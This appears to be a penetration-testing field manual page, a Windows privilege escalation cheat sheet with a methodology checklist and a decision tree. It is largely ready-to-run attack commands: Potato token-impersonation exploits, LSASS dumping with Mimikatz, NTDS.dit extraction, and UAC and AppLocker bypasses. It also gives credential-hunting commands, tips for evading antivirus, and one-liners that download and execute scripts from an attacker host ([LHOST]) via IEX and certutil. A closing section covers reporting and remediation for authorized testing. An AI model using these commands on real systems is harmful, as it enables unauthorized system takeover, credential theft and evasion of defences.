Field Manual

Windows PrivEsc Cheat Sheet

4 min read

🛡️ Methodology Checklist

  • whoami /priv → map enabled privileges to attack path
  • Get OS build number → select correct Potato variant
  • whoami /groups → check for Backup Operators, DnsAdmins, Server Operators
  • Run WinPEAS + Seatbelt + PowerUp for automated coverage
  • Credential hunt: findstr, PS history, cmdkey, KeePass, LaZagne
  • Check service/registry weak permissions via SharpUp
  • UAC bypass if user is in Administrators group
  • Document full escalation chain for report

🎯 Operational Context

Use when: Windows shell obtained — quick reference for privilege escalation enumeration sequence and tool commands. Think Dumber First: whoami /allwinpeas.exePowerUp.ps1 Invoke-AllChecks. Run in that order. whoami /all shows current privileges. WinPEAS highlights quick wins in red. PowerUp catches unquoted service paths and weak registry perms. Skip when: N/A — reference document.

⚡ Tactical Cheatsheet

CommandTactical Outcome
whoami /privCheck token privileges (SeImpersonate, SeDebug, SeTakeOwnership)
whoami /groupsGroup memberships (Backup Ops, DnsAdmins, Administrators)
.\winPEASx64.exeFull automated enumeration — start here
.\SharpUp.exe auditService/binary/DLL weak permissions
Get-MpComputerStatusDefender status — plan evasion if enabled
netstat -anoListening ports — internal services to tunnel
cmdkey /listSaved credentials for runas /savecred
findstr /SIM /C:"password" *.txt *.xml *.iniQuick file-based credential search
(Get-PSReadLineOption).HistorySavePathPowerShell history file with cleartext commands
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"AutoLogon creds
sc.exe config [SVC] binpath= "cmd /c [CMD]"Modify service binpath (space after = is mandatory)
.\PrintSpoofer.exe -i -c powershell.exeSeImpersonate → SYSTEM (Server 2019+)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c [CMD]" -t *SeImpersonate → SYSTEM (Server 2016)
msiexec /i evil.msi /quietAlwaysInstallElevated → SYSTEM via MSI

🔬 Deep Dive & Workflow

Windows PrivEsc Decision Tree

START: whoami /priv + whoami /groups
│
├── SeImpersonatePrivilege ENABLED?
│   ├── Build ≤ 1809 → JuicyPotato.exe
│   └── Build ≥ 1809 → PrintSpoofer.exe / GodPotato
│
├── SeDebugPrivilege ENABLED?
│   └── Dump LSASS → Mimikatz sekurlsa::logonpasswords
│
├── SeTakeOwnershipPrivilege ENABLED?
│   └── takeown + icacls → read/replace any file
│
├── Backup Operators GROUP?
│   └── SeBackupPrivilege → copy NTDS.dit → secretsdump.py
│
├── DnsAdmins GROUP?
│   └── dnscmd /config /serverlevelplugindll → restart DNS → SYSTEM
│
├── Local Administrators GROUP (at Medium integrity)?
│   └── UAC Bypass → srrstr.dll / fodhelper → High integrity
│
├── cmdkey /list → saved creds?
│   └── runas /savecred /user:[USER] cmd.exe
│
├── AlwaysInstallElevated?
│   └── msfvenom MSI → msiexec /i → SYSTEM
│
├── Weak service permissions?
│   └── SharpUp → sc.exe config binpath= / overwrite binary
│
├── Unquoted service paths?
│   └── Plant binary in unquoted path segment → restart service
│
├── Credential files?
│   └── findstr / PSReadLine / PSCredential XML / registry
│
└── No quick win → WinPEAS full output → manual review

Potato Attack Selector

OSBuildTool
Server 2008 / Win 7< 7601RottenPotato
Server 2016 / Win 10≤ 14393JuicyPotato
Server 2019 / Win 10≥ 17763PrintSpoofer, RoguePotato, GodPotato
Server 2022≥ 20348GodPotato

File Transfer Quick Reference

# certutil (most reliable — signed MS binary)
certutil -urlcache -split -f http://[LHOST]/[FILE] C:\temp\[FILE]
 
# PowerShell
(New-Object Net.WebClient).DownloadFile('http://[LHOST]/[FILE]', 'C:\temp\[FILE]')
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/script.ps1')
 
# Invoke-WebRequest
iwr http://[LHOST]/[FILE] -OutFile C:\temp\[FILE]
 
# SMB
net use Z: \\[LHOST]\share /user:guest ""
copy Z:\[FILE] C:\temp\
 
# Base64 encode and paste (when no network from target)
# Attacker: base64 -w 0 file.exe
# Target:   echo "[BASE64]" | base64 -d > file.exe (or use PS)
[IO.File]::WriteAllBytes("C:\temp\file.exe", [Convert]::FromBase64String("[BASE64]"))

Key LOLBAS for Payload Execution

BinaryUse
certutil.exeDownload files, base64 encode/decode
mshta.exeExecute HTA payloads
regsvr32.exeExecute SCT scripts via COM
rundll32.exeExecute DLLs, JS, etc.
cmstp.exeAppLocker bypass + UAC bypass
msiexec.exeExecute MSI payloads
installutil.exeExecute .NET assemblies
wmic.exeExecute processes, XSL scripts
msbuild.exeBuild and execute C# inline tasks

Common Service Accounts with SeImpersonate

IIS:           IIS AppPool\[APPNAME], NT AUTHORITY\IUSR
MSSQL:         NT SERVICE\MSSQLSERVER, MSSQL$INSTANCE
MySQL:         NETWORK SERVICE
Exchange:      NT AUTHORITY\NETWORK SERVICE
Jenkins:       varies — often LocalSystem or service account

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
winpeas.exe detected by AVDefault signatureUse PowerShell: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEASany.ps1')
PowerUp.ps1 blockedExecution policyLoad via IEX: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1'); Invoke-AllChecks
whoami /all shows no special privsStandard user tokenCheck if admin in local group: net localgroup administrators; or token impersonation available
Unquoted service path found but not exploitableCannot write to service binary dirNeed write access to one of the unquoted path directories; check each with icacls
All standard checks negativeNeed deeper lookCheck: DLL hijacking paths, AlwaysInstallElevated registry keys, scheduled tasks, and token impersonation

📝 Reporting Trigger

Finding Title: Windows Privilege Escalation Vector Identified Impact: Windows system misconfiguration identified via automated and manual enumeration provides a privilege escalation path from a low-privileged user to SYSTEM or Administrator without additional exploitation. Root Cause: System not configured against CIS Windows Benchmark. Default or misconfigured service permissions, registry ACLs, or unquoted service paths not remediated. Recommendation: Apply CIS Windows Server Benchmark. Run PowerUp.ps1 against all systems as part of regular hardening audit. Review service configurations and registry key permissions. Implement automated misconfiguration scanning.

🔗 Related Nodes

Graph View

Backlinks